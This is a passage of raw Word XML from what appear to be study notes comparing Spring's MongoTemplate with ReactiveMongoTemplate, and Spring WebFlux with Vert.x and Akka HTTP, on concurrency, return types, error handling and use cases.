          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where threads are not blocked, and the application can efficiently handle other tasks while waiting for database responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0800398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0BAACE3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2B547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it can cause thread exhaustion under high load, where each database operation consumes a thread from the thread pool, leading to performance degradation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F78829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7D3663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handling a large number of concurrent database requests without blocking threads, making it more </w:t>
      </w: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fficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> under high load. The non-blocking nature of reactive programming helps to maximize the use of threads, which is ideal for applications that need to handle high levels of concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA42DD3"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Integration with Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777ED07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570F624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signed for traditional Spring MVC applications, which are blocking and synchronous by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0439445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23FF603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ecifically designed for integration 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reactive framework), allowing applications to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking, asynchronous operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for database interaction. It integrates seamlessly with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Spring's reactive programming library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171B416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e Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA8C5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4BF5B6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traditional Spring applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where synchronous database operations are sufficient, and blocking behavior is acceptable, such as small to medium-sized applications with lower concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C21C9D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5748437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especially when the application needs to handl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al-time update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database interactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for scalable performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A52408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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1082F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0AC1A22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rror handling is synchronous and generally involves traditional exception handling (e.g., try-catch blocks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41754CF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4C16611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 is part of the reactive pipeline and can be handled using reactive operators like onErrorResume(), onErrorReturn(), etc., making it more flexible for managing asynchronous errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1196B20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5D37884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ongoTemplate in a Traditional Spring Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3673392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D6433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MongoTemplate mongoTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080E42C4" w14:textId="77777777" w:rsidR="00B506B2" w:rsidRPr="00B13F85" w:rsidRDefault="00B506B2" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2624151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List&lt;Item&gt; getItems() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5149326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goTemplate.findAll(Item.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001F4B4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B9681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thread is blocked while fetching the items.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FAE41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ReactiveMongoTemplate in a Reactive Spring WebFlux Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0CCE0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49479D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ReactiveMongoTemplate reactiveMongoTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B79FC13" w14:textId="77777777" w:rsidR="00B506B2" w:rsidRPr="00B13F85" w:rsidRDefault="00B506B2" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C83E2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Items() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04D1B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All(Item.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EEC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582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database operation is non-blocking, and it returns a Flux that can be subscribed to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445412A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792"/>
        <w:gridCol w:w="4619"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="773ADBD7" w14:textId="77777777" w:rsidTr="00B506B2">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="685C1C0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pect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30AD364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ngoTemplate (Traditional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0009136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MongoTemplate (Spring WebFlux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="46E2E976" w14:textId="77777777" w:rsidTr="00B506B2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2810BD7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2542721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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="012015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asynchronous)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="154BD0A7" w14:textId="77777777" w:rsidTr="00B506B2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A233F2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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="053B17C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values (e.g., List&lt;T&gt;)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="470B3DB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types (Mono, Flux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="4219030B" w14:textId="77777777" w:rsidTr="00B506B2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18906678"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Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76B7CE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threads for each operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="046F6F9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handles concurrency more efficiently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="3FEDD9BE" w14:textId="77777777" w:rsidTr="00B506B2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54969B4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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30CEF9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traditional Spring MVC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F51607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Spring WebFlux (reactive framework)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="4073716D" w14:textId="77777777" w:rsidTr="00B506B2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22C7302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4E902C9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lead to thread exhaustion under high load</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C0BEC4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 handles high concurrency without thread blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="08DFA001" w14:textId="77777777" w:rsidTr="00B506B2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27D32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6A8F2B3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exception handling (e.g., try-catch)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1179CD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 like onErrorResume()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="65772F82" w14:textId="77777777" w:rsidTr="00B506B2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0609F1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Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4694AC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web apps with lower concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50A5032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highly scalable, real-time, and concurrent applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2866727B"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D42B3D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s appropriat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pplications where database operations don't need to be asynchronous.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FB4E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is designed for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pplications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provides non-blocking database operations, which helps to maximize scalability and performance in scenarios with high concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743B643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335" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="257FE673" w14:textId="784F198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5" w:name="_Toc197867759"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Spring WebFlux compare to Vert.x and Akka HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="545"/>
    </w:p>
    <w:p w14:paraId="4386068F" w14:textId="15A4E9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re Concepts and Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E58B1F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2BB09B5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ilt on Reactor (and RxJava for alternative)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring WebFlux is part of the Spring ecosystem and relies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or optionally RxJava) to provide non-blocking, reactive programming features. It use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and integrates well with Spring Boot and other Spring components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3144121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Spring ecosystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Thread-per-request model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Us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as the underlying server for reactive HTTP communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D9A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6F19F03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synchronous, and non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Vert.x is a polyglot, lightweight, event-driven framework built on top of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It allows you to write highly concurrent, non-blocking applications using a small number of threads. It is not tied to any specific language, though Java is the most popular.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5121EC5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model for each core processor (no thread-per-request), making it extremely efficient for handling concurrent I/O-bound operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D75790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w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Supports multiple languages like Java, Kotlin, JavaScript, Groovy, and Ruby, making it more flexible for polyglot applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB1328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EEC19D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Akka HTTP is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Akka framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which us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for building highly concurrent, scalable systems. The Akka model focuses on </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message-passing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between lightweight actors to achieve concurrency and avoid mutable state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A935A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Like Vert.x, Akka HTTP provides non-blocking, asynchronous I/O. It integrates well with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Akka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to support backpressure and streaming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207C705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style routing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Akka HTTP has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional routing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model where routes are defined as functions. It also supports custom handling and transformations of HTTP responses and requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EE41D9"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currency Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F60FAE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368708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WebFlux is based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which use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handle concurrency. It support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0 or 1 item)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0 to N items) as abstractions for asynchronous sequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755C00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It uses an event-loop model for handling I/O, ensuring non-blocking, non-blocking operations with a small number of threads for maximum throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657963E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7CFB909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loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> per core processor to handle asynchronous I/O operations. Each thread is shared across multiple handlers, and it allows event-driven programming with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking calls</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E665E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 xml:space="preserve">: Vert.x uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>verticles</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, lightweight event-driven components that run on event loops, and is designed to scale horizontally without blocking threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E0AE6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490856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kka HTTP leverag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to handle concurrency. It has </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>actors</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Akka Streams is integrated with Akka HTTP to handle backpressure when consuming streams of data, ensuring resource efficiency even under heavy load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742040D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Ease of Use and Integration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1465512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DE70A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 for Spring users</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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lexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring WebFlux can be complex to configure, especially when dealing with functional routing and the low-level reactive programming concepts. However, Spring Boot provides an easy way to get started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3761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3DB14E5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exibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Vert.x is </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lightweight</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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 support</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It has the advantage of supporting multiple languages, which is beneficial for polyglot environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAEE3C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5F6454B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 complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Akka HTTP is well-suited for applications where concurrency and message-passing are central. However, it requires understanding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which might be difficult for developers without prior experience in distributed systems or concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271265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r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It integrates well with the broader Akka toolkit (such as Akka Streams and Akka Cluster) but might feel heavier for simple use cases compared to Spring WebFlux or Vert.x.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C5ABC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455C5CA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35AEDE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active Programming</w:t>
      </w:r>
